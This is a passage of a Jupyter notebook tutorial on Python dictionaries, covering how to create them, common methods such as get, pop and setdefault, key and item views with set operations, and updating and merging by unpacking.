# Section 03 - Dictionaries

##  Creating Python Dictionaries

There are different mechanisms available to create dictionaries in Python.

#### Literals

We can use a literal to create a dictionary:

In [1]:
a = {'k1': 100, 'k2': 200}

In [2]:
a

{'k1': 100, 'k2': 200}

Note that the order in which the items are listed in the literal is maintained when listing out the elements of the dictionary. This does not hold for Python version earlier than 3.6 (practically, version 3.5).

Another thing to note is that dictionary **keys** must be hashable objects. Associated values on the other hand can be any object.

So tuples of hashable objects are themselves hashable, but lists are not, even if they only contain hashable elements. Tuples of non-hashable elements are also not hashable.

In [3]:
hash((1, 2, 3))

2528502973977326415

In [4]:
hash([1, 2, 3])

TypeError: unhashable type: 'list'

In [5]:
hash(([1, 2], [3, 4]))

TypeError: unhashable type: 'list'

So we can create dictionaries that look like this:

In [6]:
a = {('a', 100): ['a', 'b', 'c'], 'key2': {'a': 100, 'b': 200}}

In [7]:
a

{('a', 100): ['a', 'b', 'c'], 'key2': {'a': 100, 'b': 200}}

Interestingly, functions are hashable:

In [8]:
def my_func(a, b, c):
    print(a, b, c)

In [9]:
hash(my_func)

284093589

Which means we can use functions as keys in dictionaries:

In [10]:
d = {my_func: [10, 20, 30]}

A simple application of this might be to store the argument values we want to use to call the function at a later time:

In [11]:
def fn_add(a, b):
    return a + b

def fn_inv(a):
    return 1/a

def fn_mult(a, b):
    return a * b

In [12]:
funcs = {fn_add: (10, 20), fn_inv: (2,), fn_mult: (2, 8)}

Remember that when we iterate through a dictionary we are actually iterating through the keys:

In [13]:
for f in funcs:
    print(f)

<function fn_add at 0x10eeec8c8>
<function fn_inv at 0x10eeec6a8>
<function fn_mult at 0x10eeec620>


We can then call the functions this way:

In [14]:
for f in funcs:
    result = f(*funcs[f])
    print(result)

30
0.5
16


We can also iterate through the items (as tuples) in a dictionary as follows:

In [15]:
for f, args in funcs.items():
    print(f, args)

<function fn_add at 0x10eeec8c8> (10, 20)
<function fn_inv at 0x10eeec6a8> (2,)
<function fn_mult at 0x10eeec620> (2, 8)


So we could now call each function this way:

In [16]:
for f, args in funcs.items():
    result = f(*args)
    print(result)

30
0.5
16


#### Using the class constructor

We can also use the class constructor `dict()` in different ways:

##### Keyword Arguments

In [17]:
d = dict(a=100, b=200)

In [18]:
d

{'a': 100, 'b': 200}

The restriction here is that the key names must be valid Python identifiers, since they are being used as argument names.

We can also build a dictionary by passing it an iterable containing the keys and the values:

In [19]:
d = dict([('a', 100), ('b', 200)])

In [20]:
d

{'a': 100, 'b': 200}

The restriction here is that the elements of the iterable must themselves be iterables with exactly two elements.

In [21]:
d = dict([('a', 100), ['b', 200]])

In [22]:
d

{'a': 100, 'b': 200}

Of course we can also pass a dictionary as well:

In [23]:
d = {'a': 100, 'b': 200, 'c': {'d': 1, 'e': 2}}

Here I am using a dictionary that happens to contain a nested dictionary for the key `c`.

Let's look at the id of `d`:

In [24]:
id(d)

4545038016

And let's create a dictionary:

In [25]:
new_dict = dict(d)

In [26]:
new_dict

{'a': 100, 'b': 200, 'c': {'d': 1, 'e': 2}}

What's the id of `new_dict`?

In [27]:
id(new_dict)

4545071576

As you can see, we have a new object - however, what about the nested dictionary?

In [28]:
id(d['c']), id(new_dict['c'])

(4545357864, 4545357864)

As you can see they are the same - so be careful, using the `dict` constructor this way essentially creates a **shallow copy**.

We'll come back to copying dicts later.

#### Using Comprehensions

We can also create dictionaries using a dictionary comprehension.
This is very similar to list comprehensions or generator expressions.

Suppose we have two iterables, one containing some keys, and one containing some values we want to associate with each key:

In [29]:
keys = ['a', 'b', 'c']
values = (1, 2, 3)

We can then easily create a dictionary this way - the non-Pythonic way!

In [30]:
d = {}  # creates an empty dictionary
for k, v in zip(keys, values):
    d[k] = v

In [31]:
d

{'a': 1, 'b': 2, 'c': 3}

But it is much simpler to use a dictionary comprehension:

In [32]:
d = {k: v for k, v in zip(keys, values)}

In [33]:
d

{'a': 1, 'b': 2, 'c': 3}

Dictionary comprehensions support the same syntax as list comprehensions - you can have nested loops, `if` statements, etc.

In [34]:
keys = ['a', 'b', 'c', 'd']
values = (1, 2, 3, 4)

d = {k: v for k, v in zip(keys, values) if v % 2 == 0}

In [35]:
d

{'b': 2, 'd': 4}

In the following example we are going to create a grid of 2D coordinate pairs, and calculate their distance from the origin:

In [36]:
x_coords = (-2, -1, 0, 1, 2)
y_coords = (-2, -1, 0, 1, 2)

If you remember list comprehensions, we would create all possible `(x,y)` pairs using nested loops (a Cartesian product):

In [37]:
grid = [(x, y) 
         for x in x_coords 
         for y in y_coords]
grid

[(-2, -2),
 (-2, -1),
 (-2, 0),
 (-2, 1),
 (-2, 2),
 (-1, -2),
 (-1, -1),
 (-1, 0),
 (-1, 1),
 (-1, 2),
 (0, -2),
 (0, -1),
 (0, 0),
 (0, 1),
 (0, 2),
 (1, -2),
 (1, -1),
 (1, 0),
 (1, 1),
 (1, 2),
 (2, -2),
 (2, -1),
 (2, 0),
 (2, 1),
 (2, 2)]

In [38]:
import math

We can use the `math` module's `hypot` function to do calculate these distances

In [39]:
math.hypot(1, 1)

1.4142135623730951

So to calculate these distances for all our points we would do this:

In [40]:
grid_extended = [(x, y, math.hypot(x, y)) for x, y in grid]
grid_extended

[(-2, -2, 2.8284271247461903),
 (-2, -1, 2.23606797749979),
 (-2, 0, 2.0),
 (-2, 1, 2.23606797749979),
 (-2, 2, 2.8284271247461903),
 (-1, -2, 2.23606797749979),
 (-1, -1, 1.4142135623730951),
 (-1, 0, 1.0),
 (-1, 1, 1.4142135623730951),
 (-1, 2, 2.23606797749979),
 (0, -2, 2.0),
 (0, -1, 1.0),
 (0, 0, 0.0),
 (0, 1, 1.0),
 (0, 2, 2.0),
 (1, -2, 2.23606797749979),
 (1, -1, 1.4142135623730951),
 (1, 0, 1.0),
 (1, 1, 1.4142135623730951),
 (1, 2, 2.23606797749979),
 (2, -2, 2.8284271247461903),
 (2, -1, 2.23606797749979),
 (2, 0, 2.0),
 (2, 1, 2.23606797749979),
 (2, 2, 2.8284271247461903)]

We can now easily tweak this to make a dictionary, where the coordinate pairs are the key, and the distance the value:

In [41]:
grid_extended = {(x, y): math.hypot(x, y) for x, y in grid}

In [42]:
grid_extended

{(-2, -2): 2.8284271247461903,
 (-2, -1): 2.23606797749979,
 (-2, 0): 2.0,
 (-2, 1): 2.23606797749979,
 (-2, 2): 2.8284271247461903,
 (-1, -2): 2.23606797749979,
 (-1, -1): 1.4142135623730951,
 (-1, 0): 1.0,
 (-1, 1): 1.4142135623730951,
 (-1, 2): 2.23606797749979,
 (0, -2): 2.0,
 (0, -1): 1.0,
 (0, 0): 0.0,
 (0, 1): 1.0,
 (0, 2): 2.0,
 (1, -2): 2.23606797749979,
 (1, -1): 1.4142135623730951,
 (1, 0): 1.0,
 (1, 1): 1.4142135623730951,
 (1, 2): 2.23606797749979,
 (2, -2): 2.8284271247461903,
 (2, -1): 2.23606797749979,
 (2, 0): 2.0,
 (2, 1): 2.23606797749979,
 (2, 2): 2.8284271247461903}

#### Using `fromkeys`

The `dict` class also provides the `fromkeys` method that we can use to create dictionaries.
This class method is used to create a dictionary from an iterable containing the keys, and a **single** value used to assign to each key.

In [43]:
counters = dict.fromkeys(['a', 'b', 'c'], 0)

In [44]:
counters

{'a': 0, 'b': 0, 'c': 0}

If we do not specify a value, then `None` is used:

In [45]:
d = dict.fromkeys('abc')

In [46]:
d

{'a': None, 'b': None, 'c': None}

Notice how I used the fact that strings are iterables to specify the three single character keys for this dictionary!

`fromkeys` method will insert the keys in the order in which they are retrieved from the iterable:

In [47]:
d = dict.fromkeys('python')

In [48]:
d

{'p': None, 'y': None, 't': None, 'h': None, 'o': None, 'n': None}

Uh-Oh!! Looks like the ordering didn't work!!
I've pointed this out a few times already, but Jupyter (this notebook), uses a printing mechanism that will order the keys alphabetically.

To see the real order of the keys in the dict we should use the print statement ourselves:

In [49]:
print(d)

{'p': None, 'y': None, 't': None, 'h': None, 'o': None, 'n': None}


Much better! :-)

##  Common Operations

You should already be aware of many of these, so I'll only spend time on some of the more interesting ones.

Dictionaries support the `len` function - this simply returns the number of key/value pairs in the dictionary:

In [1]:
d = dict(zip('abc', range(1, 4)))
d

{'a': 1, 'b': 2, 'c': 3}

In [2]:
len(d)

3

We can retrieve an element from a dictionary using `[]` notation, providing the key. If the key is not present we will get a `KeyError` exception:

In [3]:
d['a']

1

In [4]:
d['python']

KeyError: 'python'

Sometimes though, we do not want an exception to happen, and we want to provide some 'default' value instead.
We could certainly catch the exception, but that's clunky. Instead we can use the `get` instance method:

In [5]:
d.get('a')

1

In [6]:
result = d.get('python')
print(result)

None


As you can see, we do not get an exception, we simply get `None` back. We can actually specify the default to use when the key is not found:

In [7]:
d.get('python', 0)

0

This can be quite useful when we are using a dictionary to keep track of some count for different keys that are not know ahead of time (if they were, we could use `fromkeys` to initialize a dictionary with all the keys  and initial values of `0`.

Let's see a simple example of this:

##### Example

Here we have a string where we want to count the number of each character that appears in the string.
Since we know the alphabet is a-z, we could create a dictionary with these initial keys - but maybe the string contains characters outside of that, maybe punctuation marks, emojis, etc. So it's not really feasible to take that approach.

In [8]:
text = 'Sed ut perspiciatis, unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam eaque ipsa, quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt, explicabo. Nemo enim ipsam voluptatem, quia voluptas sit, aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos, qui ratione voluptatem sequi nesciunt, neque porro quisquam est, qui dolorem ipsum, quia dolor sit amet consectetur adipisci[ng] velit, sed quia non-numquam [do] eius modi tempora inci[di]dunt, ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit, qui in ea voluptate velit esse, quam nihil molestiae consequatur, vel illum, qui dolorem eum fugiat, quo voluptas nulla pariatur?'
counts = dict()
for c in text:
    counts[c] = counts.get(c, 0) + 1
print(counts)

{'S': 1, 'e': 77, 'd': 22, ' ': 128, 'u': 69, 't': 65, 'p': 22, 'r': 38, 's': 43, 'i': 76, 'c': 19, 'a': 70, ',': 20, 'n': 37, 'o': 51, 'm': 43, 'v': 15, 'l': 33, 'q': 26, 'b': 5, 'h': 3, 'x': 3, '.': 2, 'N': 1, 'f': 2, 'g': 5, '[': 3, ']': 3, '-': 1, 'U': 1, '?': 2, 'Q': 1}


We can refine this a bit - first we'll ignore spaces, then we'll want to consider lowercase and uppercase characters as the same:

In [9]:
counts = dict()
for c in text:
    key = c.lower().strip()
    if key:
        counts[key] = counts.get(key, 0) + 1
print(counts)

{'s': 44, 'e': 77, 'd': 22, 'u': 70, 't': 65, 'p': 22, 'r': 38, 'i': 76, 'c': 19, 'a': 70, ',': 20, 'n': 38, 'o': 51, 'm': 43, 'v': 15, 'l': 33, 'q': 27, 'b': 5, 'h': 3, 'x': 3, '.': 2, 'f': 2, 'g': 5, '[': 3, ']': 3, '-': 1, '?': 2}


#### Membership Tests

We can use the `in` and `not in` operators to test the presence of a **key** in a dictionary:

In [10]:
d = dict(a=1, b=2, c=3)

In [11]:
'a' in d

True

In [12]:
'z' in d

False

In [13]:
'z' not in d

True

#### Removing elements from a dictionary

We can use the `del` operator to remove a key from a dictionary:

In [14]:
d = dict.fromkeys('abcd', 0)

In [15]:
d

{'a': 0, 'b': 0, 'c': 0, 'd': 0}

We can remove a key this way:

In [16]:
del d['a']

In [17]:
d

{'b': 0, 'c': 0, 'd': 0}

If the key is not present, we will get a `KeyError` exception:

In [18]:
del d['z']

KeyError: 'z'

Just like setting elements, we may not want an exception to be raised - in which case we can use the `pop` and `popitem` instance methods instead.

Let's start with the `pop` method first.
We simply specify the **key** we want to remove from the dictionary. The `pop` method will not only remove the item (if the key is present), but also return the associated value:

In [19]:
d

{'b': 0, 'c': 0, 'd': 0}

In [20]:
result = d.pop('b')
result

0

In [21]:
d

{'c': 0, 'd': 0}

In [22]:
result = d.pop('z')

KeyError: 'z'

So we still get a `KeyError` exception!
To do this, we need to specify a **default** value to use if the key is not found:

In [23]:
result = d.pop('z', 'Not found!')
result

'Not found!'

The `popitem` method is similar, but slightly different. It does not take a key, it simply removes an element from the dictionary unless the dictionary is empty, in which case it will result in a `KeyError`. The method returns a **tuple** containing the key and the value that was just removed.

Let's take a look at a simple example:

In [24]:
d = {'a': 10, 'b': 20, 'c': 30}

In [25]:
d.popitem()

('c', 30)

In [26]:
d.popitem()

('b', 20)

In [27]:
d.popitem()

('a', 10)

In [28]:
d.popitem()

KeyError: 'popitem(): dictionary is empty'

So one important thing to note here is the order in which the elements of the dictionary are popped - they are popped in reverse order from how they were inserted. So as you can see above, `c` was inserted last, and hence was popped first.
So this is called a **LIFO** (last in, first out) order, and since dicts are ordered in Python 3.6+, this LIFO order when popping is also guaranteed.

**Versions prior to 3.6 do not guarantee this order.**

#### Inserting keys with a default

Sometimes we may want to insert an element in a dictionary with a default value, but only if the element is not already present:

In [29]:
d = {'a': 1, 'b': 2, 'c': 3}

We could do it this way:

In [30]:
if 'z' not in d:
    d['z'] = 0

In [31]:
d

{'a': 1, 'b': 2, 'c': 3, 'z': 0}

We could write a simple utility function to do this for us, and return the value of the item as well while we're at it:

In [32]:
def insert_if_not_present(d, key, value):
    if key not in d:
        d[key] = value
        return value
    else:
        return d[key]

In [33]:
print(d)

{'a': 1, 'b': 2, 'c': 3, 'z': 0}


In [34]:
result = insert_if_not_present(d, 'a', 0)
print(result, d)

1 {'a': 1, 'b': 2, 'c': 3, 'z': 0}


In [35]:
result = insert_if_not_present(d, 'y', 10)
print(result, d)

10 {'a': 1, 'b': 2, 'c': 3, 'z': 0, 'y': 10}


But instead, we can simply use the `setdefault` instance method, which will do the work we just did:

In [36]:
d = {'a': 1, 'b': 2, 'c': 3}
result = d.setdefault('a', 0)
print(result)
print(d)

1
{'a': 1, 'b': 2, 'c': 3}


In [37]:
result = d.setdefault('z', 100)
print(result)
print(d)

100
{'a': 1, 'b': 2, 'c': 3, 'z': 100}


This is quite a useful method.
Let's take a look at that example we did earlier that looked at how many times each character occurred in a string:

In [38]:
text = 'Sed ut perspiciatis, unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam eaque ipsa, quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt, explicabo. Nemo enim ipsam voluptatem, quia voluptas sit, aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos, qui ratione voluptatem sequi nesciunt, neque porro quisquam est, qui dolorem ipsum, quia dolor sit amet consectetur adipisci[ng] velit, sed quia non-numquam [do] eius modi tempora inci[di]dunt, ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit, qui in ea voluptate velit esse, quam nihil molestiae consequatur, vel illum, qui dolorem eum fugiat, quo voluptas nulla pariatur?'
counts = dict()
for c in text:
    key = c.lower().strip()
    if key:
        counts[key] = counts.get(key, 0) + 1
print(counts)

{'s': 44, 'e': 77, 'd': 22, 'u': 70, 't': 65, 'p': 22, 'r': 38, 'i': 76, 'c': 19, 'a': 70, ',': 20, 'n': 38, 'o': 51, 'm': 43, 'v': 15, 'l': 33, 'q': 27, 'b': 5, 'h': 3, 'x': 3, '.': 2, 'f': 2, 'g': 5, '[': 3, ']': 3, '-': 1, '?': 2}


Suppose now that we just want a dictionary to track the uppercase, lowercase, and other characters in the string (i.e. kind of grouping the data by uppercase, lowercase, other) - again ignoring spaces:

In [39]:
import string
print(string.ascii_lowercase)
print(string.ascii_uppercase)

abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ


Here's one approach we might take:

In [40]:
categories = {}
for c in text:
    if c != ' ':
        if c in string.ascii_lowercase:
            key = 'lower'
        elif c in string.ascii_uppercase:
            key = 'upper'
        else:
            key = 'other'
        if key not in categories:
            categories[key] = set()  # set we'll insert the value into
        
        categories[key].add(c)
for cat in categories:
    print(f'{cat}:', ''.join(categories[cat]))

upper: UQNS
lower: dlsumxihcfbapnroeqtvg
other: [?-].,


We can simplify this a bit using `setdefault`:

In [41]:
categories = {}
for c in text:
    if c != ' ':
        if c in string.ascii_lowercase:
            key = 'lower'
        elif c in string.ascii_uppercase:
            key = 'upper'
        else:
            key = 'other'
        categories.setdefault(key, set()).add(c)

for cat in categories:
    print(f'{cat}:', ''.join(categories[cat]))

upper: UQNS
lower: dlsumxihcfbapnroeqtvg
other: [?-].,


Just to clean things up a but more, let's create a small utility function that will return the category key:

In [42]:
def cat_key(c):
    if c == ' ':
        return None
    elif c in string.ascii_lowercase:
        return 'lower'
    elif c in string.ascii_uppercase:
        return 'upper'
    else:
        return 'other'

In [43]:
categories = {}
for c in text:
    key = cat_key(c)
    if key:
        categories.setdefault(key, set()).add(c)

for cat in categories:
    print(f'{cat}:', ''.join(categories[cat]))

upper: UQNS
lower: dlsumxihcfbapnroeqtvg
other: [?-].,


If you are not a fan of using `if...elif...` in the `cat_key` function we could do it this way as well:

In [44]:
def cat_key(c):
    categories = {' ': None,
                 string.ascii_lowercase: 'lower',
                 string.ascii_uppercase: 'upper'}
    for key in categories:
        if c in key:
            return categories[key]
    else:
        return 'other'

In [45]:
cat_key('a'), cat_key('A'), cat_key('!'), cat_key(' ')

('lower', 'upper', 'other', None)

This approach is easier to extend without having a lot of `elif` statements, but for a few categories, I find the first implementation much clearer to read and understand.

In [46]:
categories = {}
for c in text:
    key = cat_key(c)
    if key:
        categories.setdefault(key, set()).add(c)

for cat in categories:
    print(f'{cat}:', ''.join(categories[cat]))

upper: UQNS
lower: dlsumxihcfbapnroeqtvg
other: [?-].,


We could also do it this way, creating a categories dictionary that has all the individual characters we are interested in:

In [47]:
from itertools import chain

def cat_key(c):
    cat_1 = {' ': None}
    cat_2 = dict.fromkeys(string.ascii_lowercase, 'lower')
    cat_3 = dict.fromkeys(string.ascii_uppercase, 'upper')
    categories = dict(chain(cat_1.items(), cat_2.items(), cat_3.items()))
    # categories = {**cat_1, **cat_2, **cat_3} - I'll explain this later
    return categories.get(c, 'other')

In [48]:
cat_key('a'), cat_key('A'), cat_key('!'), cat_key(' ')

('lower', 'upper', 'other', None)

In [49]:
categories = {}
for c in text:
    key = cat_key(c)
    if key:
        categories.setdefault(key, set()).add(c)
        
for cat in categories:
    print(f'{cat}:', ''.join(categories[cat]))

upper: UQNS
lower: dlsumxihcfbapnroeqtvg
other: [?-].,


#### Clearing All Items

If we want to remove all the keys in a dictionary, we can use the `clear` method:

In [50]:
d = {'a': 1, 'b': 2, 'c': 3}

In [51]:
d

{'a': 1, 'b': 2, 'c': 3}

In [52]:
d.clear()

In [53]:
d

{}

As you can see, Python dictionaries are extremely flexible and have all sorts of useful methods we can use to manipulate them.

##  Views: keys, values and items

We'll come back to these dictionary views in a lot more detail once we have studied sets, because they are very related.

For now, let's just briefly look at the basics of these views.

Views are special objects that support set behavior and also support iteration over the keys, values, and key/value pairs (items) in a dictionary.

A quick look at some common set operations:

In [1]:
s1 = {1, 2, 3}
s2 = {2, 3, 4}

Unions:

In [2]:
s1 | s2

{1, 2, 3, 4}

Intersections:

In [3]:
s1 & s2

{2, 3}

Differences:

In [4]:
s1 - s2

{1}

In [5]:
s2 - s1

{4}

Now let's look at these views:

In [6]:
d1 = {'a': 1, 'b': 2, 'c': 3}
d2 = {'c': 30, 'd': 4, 'e': 5}

We can iterate over the keys of a dictionary using the dictionary's iterator directly, or via the `keys` view:

In [7]:
for key in d1:
    print(key)

a
b
c


In [8]:
for key in d1.keys():
    print(key)

a
b
c


We can iterate over just the values of the dictionary:

In [9]:
for value in d1.values():
    print(value)

1
2
3


and over the items, as tuples, of the dictionary:

In [10]:
for item in d1.items():
    print(item)

('a', 1)
('b', 2)
('c', 3)


We can also unpack the tuples directly while iterating:

In [11]:
for k, v in d1.items():
    print(k, v)

a 1
b 2
c 3


These views are iterables, not just iterators:

In [12]:
keys = d1.keys()

In [13]:
list(keys)

['a', 'b', 'c']

In [14]:
list(keys)

['a', 'b', 'c']

As you can see we can iterate over and over on the same view.

The order in which keys, value and items are returned during iteration match - as long as the dictionary has not changed in-between.

So for example, the following expression will always evaluate to true:

In [15]:
list(d1.items()) == list(zip(d1.keys(), d1.values()))

True

Views are dynamic, in the sense that if something changes in the dictionary, the views immediately reflect the change - that's because the views do not themselves contain data, they simply have extra bits of functionality that uses the dictionary as the source of truth.

In [16]:
keys

dict_keys(['a', 'b', 'c'])

In [17]:
d1['z'] = 10

In [18]:
keys

dict_keys(['a', 'b', 'c', 'z'])

In [19]:
del d1['z']

In [20]:
keys

dict_keys(['a', 'b', 'c'])

Now, the interesting thing is that some of these views also exhibit set behaviors.

In [21]:
print(d1)
print(d2)

{'a': 1, 'b': 2, 'c': 3}
{'c': 30, 'd': 4, 'e': 5}


We can find all the keys that are in both `d1` and `d2`:

In [22]:
print(type(d1.keys()), d1.keys())
print(type(d2.keys()), d2.keys())
union = d1.keys() | d2.keys()
print(type(union), union)

<class 'dict_keys'> dict_keys(['a', 'b', 'c'])
<class 'dict_keys'> dict_keys(['c', 'd', 'e'])
<class 'set'> {'a', 'b', 'e', 'c', 'd'}


One thing to really watch out for here: once we start performing set like operations, the result is a true `set`, and although ordering in the views is guaranteed, ordering in the resulting sets are **not** as you can see from the example above!

We can also find the keys that are in both `d1` and `d2`:

In [23]:
d1.keys() & d2.keys()

{'c'}

We can also find the keys that are only in `d1` but not in `d2`:

In [24]:
d1.keys() - d2.keys()

{'a', 'b'}

The same works with items as well:

In [25]:
d1.items() | d2.items()

{('a', 1), ('b', 2), ('c', 3), ('c', 30), ('d', 4), ('e', 5)}

You'll notice that `('c', 3)` and `('c', 30)` are distinct elements, hence they show up as individual elements in the result.

Values on the other hand are more problematic. Keys in a dictionary must be hashable, and set elements must also be hashable, so it's not a problem creating a set of keys for example. But what about values? These need noe be unique or hashable. And items for that matter? The first element of the tuple must be hashable since it's the key, but the value?

In [26]:
d3 = {'a': [1, 2], 'b': [3, 4]}
d4 = {'b': [30, 40], 'c': [5, 6]}

In [27]:
d3.values()

dict_values([[1, 2], [3, 4]])

Can we perform some set operations on the values?

In [28]:
d3.values() | d4.values()

TypeError: unsupported operand type(s) for |: 'dict_values' and 'dict_values'

The answer is no, the `values` view does not behave like a set - it can't because there is no guarantee the values are unique and hashable.

What's interesting though is that `items` does have unique values (since the keys are unique), but the values may or may not be hashable as in the example of `d3` and `d4`:

In [29]:
print(d3)
print(d4)

{'a': [1, 2], 'b': [3, 4]}
{'b': [30, 40], 'c': [5, 6]}


In [30]:
d3.items() | d4.items()

TypeError: unhashable type: 'list'

As you can see, `items`, in this case also does not exhibit set like capabilities.

But that's not always the case. Let's go back to our first example:

In [31]:
print(d1)
print(d2)

{'a': 1, 'b': 2, 'c': 3}
{'c': 30, 'd': 4, 'e': 5}


In [32]:
d1.items() | d2.items()

{('a', 1), ('b', 2), ('c', 3), ('c', 30), ('d', 4), ('e', 5)}

Aha! In this case `items` **does** behave like a set - that's because the values are all hashable!

That's all I'm going to cover for now on dictionary views, we'll come back to them in greater detail in the context of sets.

##### Example 1

Let's take a look at a practical example of using these views for something other than plain iteration:

Let's say we have two dictionaries, and we want to create a new dictionary that contains all the items whose keys are in both dictionaries.
We want the value in the new dictionary to be a tuple containing all the values from both dictionaries:

In [33]:
d1 = {'a': 1, 'b': 2, 'c': 3}
d2 = {'b': 2, 'c': 30, 'd': 4}

In [34]:
k1 = d1.keys()
k2 = d2.keys()
k1 & k2

{'b', 'c'}

So we have now identified the common keys, all that's left to do is build a dictionary from those keys and the corresponding values.

We can use a simple loop to do this:

In [35]:
new_dict = {}
for key in d1.keys() & d2.keys():
    new_dict[key] = (d1[key], d2[key])
print(new_dict)

{'b': (2, 2), 'c': (3, 30)}


But, a dictionary comprehension would be a better approach here:

In [36]:
new_dict = {key: (d1[key], d2[key]) for key in d1.keys() & d2.keys()}
print(new_dict)

{'b': (2, 2), 'c': (3, 30)}


##### Example 2

Let's tweak this a bit and generate a new dictionary, again containing just the common keys, but whose value is either the common value, or if the underlying dictionaries have different values for the same key, choose the values from the second dictionary, discarding the values from the first.

The approach is going to be almost identical to the previous example.

Let's just see which value we want to use for both cases (same values, different values):
* same values: pick value from `d1` or `d2` (since values are the same it does not matter)
* different values: pick value from `d2`

As you can see, in both cases we just need to pick the value in `d2`.

In [37]:
d1 = {'a': 1, 'b': 2, 'c': 3}
d2 = {'b': 2, 'c': 30, 'd': 4}
new_dict = {key: d2[key] for key in d1.keys() & d2.keys()}
print(new_dict)

{'b': 2, 'c': 30}


##### Example 3

For this example, suppose we have two dictionaries, and we want to identify items whose keys are **not** common to both dictionaries:

In [38]:
d1 = {'a': 1, 'b': 2, 'c': 3, 'd': 4}
d2 = {'a': 10, 'b': 20, 'c': 30, 'e': 5}

As you can see from visual inspection, we want to end up with a dictionary that looks like this:

In [39]:
{'d': 4, 'e': 5}

{'d': 4, 'e': 5}

First let's consider how we would identify the non-common keys.

Start with the union of the keys - this identifies all unique keys in both dictionaries:

In [40]:
union = d1.keys() | d2.keys()
print(union)

{'a', 'b', 'e', 'c', 'd'}


Next, we look at the intersection of the keys - this identifies all keys common to both dictionaries:

In [41]:
intersection = d1.keys() & d2.keys()
print(intersection)

{'a', 'b', 'c'}


Finally, we can remove the keys in the intersection from the kesy in the union:

In [42]:
keys = union - intersection
print(keys)

{'e', 'd'}


As you can see we now have the keys we are interested in.
All that's left is to pick up the values as well.

(We'll cover this later in the section on sets, but there's a quicker way to get this, using something called a symmetric difference.)

First note that given a key, it will be present in either `d1` or `d2`, but not both.
So to get the value for the key we need to look at both dictionaries and pick the value from whichever dictionary has the key:

In [43]:
value = d1.get('e')
print(value)

None


In [44]:
value = d2.get('e')
print(value)

5


So, we can combine these two expressions with an or to get the non-`None` value (one of them always will be `None`):

In [45]:
d1.get('d') or d2.get('d')

4

In [46]:
d1.get('e') or d2.get('e')

5

So now we need to use this to gather up the values for our keys and create a result dictionary:

We could do it using a standard loop:

In [47]:
d1 = {'a': 1, 'b': 2, 'c': 3, 'd': 4}
d2 = {'a': 10, 'b': 20, 'c': 30, 'e': 5}
union = d1.keys() | d2.keys()
intersection = d1.keys() & d2.keys()
keys = union - intersection

result = {}
for key in keys:
    result[key] = d1.get(key) or d2.get(key)
print(result)

{'e': 5, 'd': 4}


Or, better yet, we could use a dictionary comprehension:

In [48]:
result = {key: d1.get(key) or d2.get(key) for key in keys}
print(result)

{'e': 5, 'd': 4}


Just for completeness, and again, we'll cover this in detail later, we can use the symmetric difference operator for sets (`^`) which does in one operation the same thing we did with the union, intersection, and difference operators, making this even more concise:

In [49]:
d1 = {'a': 1, 'b': 2, 'c': 3, 'd': 4}
d2 = {'a': 10, 'b': 20, 'c': 30, 'e': 5}
result = {key: d1.get(key) or d2.get(key)
         for key in d1.keys() ^ d2.keys()}
print(result)

{'e': 5, 'd': 4}


##  Updating, Merging and Copying

Updating an existing key's value in a dictionary is straightforward:

In [1]:
d = {'a': 1, 'b': 2, 'c': 3}

In [2]:
d['b'] = 200

In [3]:
d

{'a': 1, 'b': 200, 'c': 3}

#### The `update` method

Sometimes however, we want to update all the items in one dictionary based on items in another dictionary.

For that we can use the `update` method.

The `update` method has three forms:
1. it can take another dictionary
2. it can take an iterable of iterables of length 2 (key, value)
3. if can take keyword arguments

You'll notice that the arguments we can use with `update` is very similar to the type of arguments we can use with the `dict()` function when we create dictionaries.

Let's look briefly at each of those forms:

In [4]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}

In [5]:
d1.update(d2)
print(d1)

{'a': 1, 'b': 2, 'c': 3, 'd': 4}


Note how the key order is maintained and based on the order in which the dictionaries were create/updated.

In [6]:
d1 = {'a': 1, 'b': 2}

In [7]:
d1.update(b=20, c=30)
print(d1)

{'a': 1, 'b': 20, 'c': 30}


Again notice how the key order reflects the order in which the parameters were specified when calling the `update` method.

In [8]:
d1 = {'a': 1, 'b': 2}

In [9]:
d1.update([('c', 2), ('d', 3)])

In [10]:
d1

{'a': 1, 'b': 2, 'c': 2, 'd': 3}

Of course we can use more complex iterables. For example we could use a generator expression:

In [11]:
d = {'a': 1, 'b': 2}
d.update((k, ord(k)) for k in 'python')
print(d)

{'a': 1, 'b': 2, 'p': 112, 'y': 121, 't': 116, 'h': 104, 'o': 111, 'n': 110}


So far we have updated dictionaries with other dictionaries or iterables that do not contain the same keys. Sometimes that does happen - in that case, the corresponding key in the dictionary being updated has it's associated value replaced by the new value:

In [12]:
d1 = {'a': 1, 'b': 2, 'c': 3}
d2 = {'b': 200, 'd': 4}
d1.update(d2)
print(d1)

{'a': 1, 'b': 200, 'c': 3, 'd': 4}


#### Unpacking dictionaries

We can also use unpacking to unpack the contents of one dictionary into the elements of another dictionary. This is very similar to how we can unpack iterables. Let's recall that first:

In [13]:
l1 = [1, 2, 3]
l2 = 'abc'
l = (*l1, *l2)
print(l)

(1, 2, 3, 'a', 'b', 'c')


We can do something similar with dictionaries:

In [14]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}
d = {**d1, **d2}
print(d)

{'a': 1, 'b': 2, 'c': 3, 'd': 4}


Again note how order is preserved.
What happens when there are conflicting keys in the unpacking?

In [15]:
d1 = {'a': 1, 'b': 2}
d2 = {'b': 200, 'c': 3}
d = {**d1, **d2}
print(d)

{'a': 1, 'b': 200, 'c': 3}


As you can see, the 'last' key/value pair wins.

Now the nice thing about unpacking is that we are not limited to just two dictionaries.

##### Example

In this example we have some dictionaries we use to configure our application.
One dictionary specifies some configuration defaults for every configuration parameter our application will need.
